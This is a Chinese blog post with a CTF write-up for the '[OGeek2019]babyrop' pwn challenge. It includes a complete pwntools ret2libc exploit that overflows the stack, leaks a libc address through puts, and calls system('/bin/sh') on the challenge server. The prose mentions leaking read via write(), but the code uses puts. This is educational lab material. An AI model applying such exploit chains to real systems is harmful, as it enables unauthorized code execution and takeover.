[OGeek2019]babyrop

最新推荐文章于 2024-05-20 02:19:44 发布
最新推荐文章于 2024-05-20 02:19:44 发布
阅读量241 收藏
点赞数 1
分类专栏: 菜狗子pwn 文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125951436
版权

文章目录

一、查看文件

在这里插入图片描述在这里插入图片描述

32位

二、IDA反编译

我们看看代码:

fd 是一个文件句柄,打开了一个给定随机值的文件,截断成四字节的 int 赋给

buf 传入 sub_804871F():

所以buf也是一个随机数。

我们按顺序看 sub_804871F(buf),

在这里插入图片描述
sprintf() 将参数 a1 转换成字符串 s,下一行读入字符串 buf,v5 为其长度

下两行把 buf 最末一个字符去掉了,v1 为其新长度

接下来的 if 嵌套 strncmp

真正的溢出点在 sub_80487D0() 内:

在这里插入图片描述
考虑通过控制参数 a1 为一个较大数(0xff),触发 read() 的栈溢出

这需要我们在 sub_804871F() 也通过 read() 进行一个溢出
让 buf 的长度达到 8 就能覆盖掉 return 的变量

接下来就就是常规的 ret2libc,

在 sub_80487D0() 通过劫持返回地址到 write() 泄露出某函数(我用的是 read )的 got 表地址

最后加上偏移得到 system() 和 ‘/bin/sh’ 的真实地址

重复调用 sub_80487D0(),栈溢出,使程序在返回时调用 system(‘/bin/sh’),成功 getshell

代码

from pwn import *

#attack
r = remote("node4.buuoj.cn",27516)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")#题目下面那个链接里下载

#params
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr = 0x8048825

#attack1
payload = b'\x00' + b'M'*6 + b'\xff'
r.sendline(payload)

#attack2
payload_1 = b'M'*(0xE7+4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(payload_1)
r.recvline()
puts_addr = u32(r.recv(4))
print("puts_addr: " + hex(puts_addr))

#attack3
r.sendline(payload)

#libc
base_addr = puts_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr: " + hex(bin_sh_addr))

#attack4
payload_2 = b'M'*(0xE7+4) + p32(system_addr) + b'M'*4 +p32(bin_sh_addr)
r.sendline(payload_2)

r.interactive()

在这里插入图片描述在这里插入图片描述

长街395
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
天池OGeek算法挑战赛数据.zip
12-21
训练数据
[OGeek2019]babyrop wp(python3脚本,py2见末尾链接)
Kata_Jhin的博客
03-08 74
[OGeek2019]babyrop wp(python3脚本,py2见末尾链接)
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 409
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
OGeek2019bayrop
m0_62322730的博客
05-06 333
OGeek2019bayrop
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3399
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 228
BUUCTF 做题练习
TianChi_OGeek
03-19
天池_OGeek 数据问题:train部分数据第1815102行漏了个引号,手动删除或不上引号即可
OGeek:基准线
03-19
OGeek 基准线 第一次提交线上0.6643第18名 后面有思路不断补充
OGeek-数据集
03-30
OGeek
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1178
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
ctf【[OGeek2019]babyrop
HUANGliang_的博客
10-29 239
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 643
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 476
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
buuctf13-17题
XDiku的博客
01-29 124
ok
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 378
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
【无标题】思科交换路由中路由引入实验指南
最新发布
m0_74259494的博客
05-20 450
路由引入是网络设计中的一个重要概念,它允许不同路由协议之间的路由信息交换。在思科网络设备中,路由引入可以增强网络的连通性和效率。本文将介绍路由引入的基本概念,并通过一个实验来演示如何在思科路由器中实现路由引入。通过本次实验,我们学习了路由引入的概念,并在思科路由器上成功实现了RIP和OSPF协议之间的路由引入。2. **路由汇总**:将多个路由汇总为一个更广泛的路由,以减少路由表的大小并优化路由信息的传播。1. **重分布**:将一种路由协议的路由信息引入到另一种路由协议中。### 步骤4:路由引入配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值